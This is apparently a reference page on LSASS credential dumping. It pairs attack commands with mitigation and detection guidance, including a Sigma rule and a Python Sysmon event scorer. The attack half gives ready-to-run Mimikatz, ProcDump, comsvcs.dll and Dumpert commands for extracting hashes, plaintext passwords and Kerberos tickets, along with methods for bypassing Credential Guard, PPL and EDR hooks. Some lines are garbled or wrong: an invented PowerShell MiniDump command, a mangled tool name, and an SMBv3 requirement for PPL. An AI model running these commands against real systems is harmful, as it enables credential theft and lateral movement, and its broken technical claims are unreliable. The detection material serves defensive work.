Critical Severity | T1003.001
LSASS Credential Dumping
Description
LSASS (Local Security Authority Subsystem Service) is a critical Windows process that handles authentication, enforces security policies, and stores user credentials in memory. Dumping LSASS allows attackers to extract plaintext passwords, hashes, and Kerberos tickets.
Why LSASS is Targeted:
- Centralized Credential Store: All authentication happens through LSASS
- Multiple Credential Types: NTLM hashes, Kerberos tickets, passwords, PINs
- SSPI Interface: All apps use LSASS for authentication
- Memory Storage: Cached credentials kept for SSO
Dumping Methods
1. Mimikatz (Direct Memory Read):
# Full credential dump
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full
sekurlsa::wdigest
sekurlsa::kerberos
sekurlsa::msv
# Export tickets
sekurlsa::tickets /export
# Export TGTs
sekurlsa::tgt
2. Procdump (Memory Dump + Offline Parse):
# Create lsass dump (AV may flag this)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Silent exit (stealth)
procdump.exe -accepteula -ma lsass.exe -o lsass.dmp -ma
# Parse dump with Mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
# Parse with pypykatz
python3 pypykatz.py lsa minidump lsass.dmp
3. Living Off the Land (No Tools):
# Use comsvcs.dll (built-in)
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump C:\temp\lsass.dmp full
# PowerShell MiniDump
powershell -c "Get-Process lsass | MiniDumpWriteMiniDump C:\temp\lsass.dmp"
# Use Debug Object (requires SeDebugPrivilege)
# Enable debug via token manipulation
4. Hookless LSASS Dumping (EDR Bypass):
# Using Dr. Båç syscall approach
# Bypass user-mode hooks on LSASS
# Via Dumpert (Outflank)
Dumpert.exe
Dumpert.exe /OutputFile:C:\temp\lsass.dmp
# Parse with Mimikatz
mimikatz "sekurlsa::minidump C:\temp\lsass.dmp" "sekurlsa::logonpasswords"
5. RDP Session Dump:
# Dump from RDP session (less likely to be detected)
# RDP caches credentials in user's context
# Use ssp (security support provider)
mimikatz "privilege::debug" "misc::ssp"
Credential Extraction
NTLM Hashes:
# Via Mimikatz
mimikatz "privilege::debug" "sekurlsa::msv" "exit"
# Format: username:rid:lmhash:nthash:::
# Example: administrator:500:aad3b435b51404eeaad3b435b51404ee:hash:::
Kerberos Tickets:
# Export all tickets
mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"
# Output: *.kirbi files
# Import and use tickets
kerberos::ptt ticket.kirbi
# List tickets
kerberos::list
WDigest Passwords (if enabled):
# Get plaintext passwords (if stored)
mimikatz "privilege::debug" "sekurlsa::wdigest" "exit"
# Requires WDigest enabled (older systems)
# Or HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1
Credential Manager (Generic Credentials):
# Target Credential Manager stores
mimikatz "privilege::debug" "token::elevate" "vault::list" "exit"
# Chrome, Edge passwords stored here
# Internet Explorer saved passwords
Defense Bypass Techniques
1. Credential Guard (Bypass):
# Credential Guard prevents direct memory read
# Bypass techniques:
# Use VCA (Virtualization-based Security) bypass
# Requires kernel read primitive
# Or target other processes (browser, services)
mimikatz "privilege::debug" "sekurlsa::logonpasswords"
# Use DPAPI theft before reaching LSASS
# Extract from browser memory
2. LSASS Protection (Bypass):
# Protected Process Light (PPL) blocks direct access
# Check protection level
Get-Process lsass | select Name,Protection
# Bypass PPL via kernel driver (not recommended)
# Or via scheduled task with vulnerable DLL
3. EDR Hook Bypass:
# Unhook user-mode DLLs
mimikatz "privilege::debug" "misc::unhook" "exit"
# Or use direct syscalls (Dumpert approach)
# Bypass ETW with NtQuerySystemInformation
# Use direct syscalls in custom tool
# Don't link against ntdll.dll (unhooked)
Mitigation
Primary Controls:
- Enable Credential Guard: Hardware-based protection for credentials
- Enable LSASS PPL: Protected Process Light (Windows 10+)
- Disable WDigest: Prevent plaintext password caching
- Restrict Debug Privileges: Only Administrators hold SeDebugPrivilege
- Deploy EDR: Detect LSASS access patterns
- Network Segmentation: Limit lateral movement
Enable Credential Guard:
# Via GPO
Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security
# Require Secure Boot
# Enable UEFI lock
# Or via PowerShell (requires reboot)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -Value 1
Enable LSASS PPL:
# Enable via registry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
# Requires Windows 10 1803+ and SMBv3
# Verify
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name RunAsPPL
Detection
Sysmon Configuration:
# Monitor lsass.exe access
# Alert on non-standard processes accessing lsass
# Sysmon ProcessAccess rule (Event ID 10): TargetImage lsass.exe, GrantedAccess 0x1000
Windows Event Log:
# Event ID 4688 - Process Create
# Look for:
# - Parent process not typical (not explorer, services.exe)
# - Command line contains lsass, procdump, mimikatz
# - Process memory dump operations
# Enable Process Tracking
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
Sigma Rules:
title: LSASS Process Access
id: lsass-access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    EventID: 10
    TargetImage|endswith: '\lsass.exe'
  filter:
    CallTrace|contains: 'ntdll.dll'
  condition: selection and not filter
level: critical
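Detection logic for the Sysmon ProcessAccess events that the Sysmon configuration and the Sigma rule above target, as an added example that is not part of the original page: it parses constructed Event ID 10 payloads and scores each handle to lsass.exe by access mask, source process and call-stack provenance. The EXPECTED_SOURCES baseline, the sample paths and the severity thresholds are assumptions for the demo.

```python
import xml.etree.ElementTree as ET

# Access-right bits checked in GrantedAccess: PROCESS_VM_READ (every dumper needs it)
# and PROCESS_ALL_ACCESS (the full 0x1fffff mask typical of procdump/mimikatz handles).
MASKS = {"vm_read": 0x0010, "all_access": 0x1FFFFF}
# Assumed baseline of processes that legitimately open lsass.exe; tune per environment.
EXPECTED_SOURCES = {"csrss.exe", "wininit.exe", "svchost.exe", "msmpeng.exe"}

def parse_event(xml_text):
    """Return the <Data Name="..."> fields of a Sysmon EventData payload as a dict."""
    return {d.get("Name"): (d.text or "") for d in ET.fromstring(xml_text).iter("Data")}

def assess(fields):
    """Return (severity, findings) for one event; ("none", []) unless it touches lsass.exe."""
    if not fields.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return "none", []
    mask = int(fields.get("GrantedAccess", "0x0"), 16)
    source = fields.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
    trace = fields.get("CallTrace", "")
    findings = [name for name, bits in MASKS.items() if mask & bits == bits]
    if source not in EXPECTED_SOURCES:
        findings.append("unexpected_source")
    # No ntdll.dll frame (or unbacked UNKNOWN frames) means the handle was opened through
    # direct syscalls, the hookless path that user-mode EDR hooks never see.
    if "UNKNOWN" in trace or "ntdll.dll" not in trace.lower():
        findings.append("no_ntdll_frame")
    # Memory-read rights from an unexpected or hook-evading source is the dumping pattern.
    evasive = "unexpected_source" in findings or "no_ntdll_frame" in findings
    sev = "critical" if "vm_read" in findings and evasive else "medium" if findings else "none"
    return sev, findings

def scan(events):
    """Map SourceImage -> (severity, findings) for every event that raises an indicator."""
    hits = {}
    for fields in map(parse_event, events):
        sev, findings = assess(fields)
        if findings:
            hits[fields["SourceImage"]] = (sev, findings)
    return hits

def ev(src, tgt, access, trace):  # builds a constructed EventData payload (not real log data)
    return ('<EventData><Data Name="SourceImage">%s</Data><Data Name="TargetImage">%s</Data>'
            '<Data Name="GrantedAccess">%s</Data><Data Name="CallTrace">%s</Data></EventData>'
            % (src, tgt, access, trace))

NTDLL_TRACE = "C:\\Windows\\SYSTEM32\\ntdll.dll+9c534|C:\\Windows\\System32\\KERNELBASE.dll+2c1ac"
LSASS = "C:\\Windows\\System32\\lsass.exe"
SAMPLES = [  # constructed events: benign query, procdump-style full access, direct-syscall dumper
    ev("C:\\Windows\\System32\\svchost.exe", LSASS, "0x1000", NTDLL_TRACE),
    ev("C:\\temp\\procdump.exe", LSASS, "0x1fffff", NTDLL_TRACE + "|C:\\temp\\dbghelp.dll+1a2b"),
    ev("C:\\Users\\Public\\svc.exe", LSASS, "0x1010", "UNKNOWN(00007FF6A2B01A2C)|UNKNOWN(00007FF6A2B01B77)"),
]
```

The Sigma rule's ntdll.dll filter only fires on the direct-syscall case, so the mask and source checks here are what catch the procdump-style handle that carries a normal call stack. Expect UNKNOWN frames from JIT-compiled code (for example .NET) and add those sources to the baseline rather than loosening the check.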
Tools
- Mimikatz: All-purpose credential extraction
- ProcDump: Sysinternals memory dump
- Dumpert: Syscall-based LSASS dump (EDR bypass)
- pypykatz: Python Mimikatz implementation for offline parsing
- lsassy: Fast LSASS parsing
- Sysmon: Security monitoring